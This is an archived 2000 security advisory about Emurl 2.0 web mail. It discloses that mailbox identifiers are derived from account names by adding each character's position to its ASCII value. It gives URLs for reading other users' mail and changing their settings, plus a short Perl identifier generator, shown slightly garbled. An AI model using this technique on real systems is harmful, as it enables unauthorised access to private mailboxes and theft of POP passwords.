Vulnerability in EMURL-based e-mail providers

2000-05-16T00:00:00
ID SECURITYVULNS:DOC:198
Type securityvulns
Reporter Securityvulns
Modified 2000-05-16T00:00:00

Description

Affected Product: Emurl 2.0 For Windows NT 4.0 (possibly others)

Product information: Emurl is web-based email host developped by SeattleLab. http://www1.seattlelab.com/emurl/

Impact: Users can access the mailbox's content of anybody on the system. They can also steal their POP passwords since Emurl allows you to fetch your POP email from more than one source.

Description: After logging into my new mail account powered by the Emurl software, this URL struck me:

http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123

I guess you all know where this is going. First, this identifier is based solely on your account name. Therefore, if you create an account with the same name on another site, you'll end up with the very same identifier.

Furthermore, this identifier can easily be determined since it is "encoded" using the ascii value of each character of the account's name and incremented by its position.

In this example, my user ID would be PBenoit and my resulting identifier would be 113100104114116111123.

p = 112 + 1 = 113 b = 98 + 2 = 100 e = 101 + 3 = 104 n = 110 + 4 = 114 o = 111 + 5 = 116 i = 105 + 6 = 111 t = 116 + 7 = 123

You could fetch the e-mails here

http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=<identifier>

... and view/change the account's settings here

http://www.somesite.com/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=<identifier>

I threw a few lines of perl together to generate this.

print "Enter your ID: "; $=lc(<STDIN>); chomp; print "Your identifier is: "; @letters=split(//, $); for ($i = 0; $i < length($_); $i++) { $mychar = ord($letters[$i])+$i+1; if ($mychar < 100) { $mychar = (0).$mychar;} print $mychar }

Vendor status: SeattleLab is aware and the issue is addressed in their next version.


FREE Personalized Email at Mail.com Sign up at http://www.mail.com/?sr=signup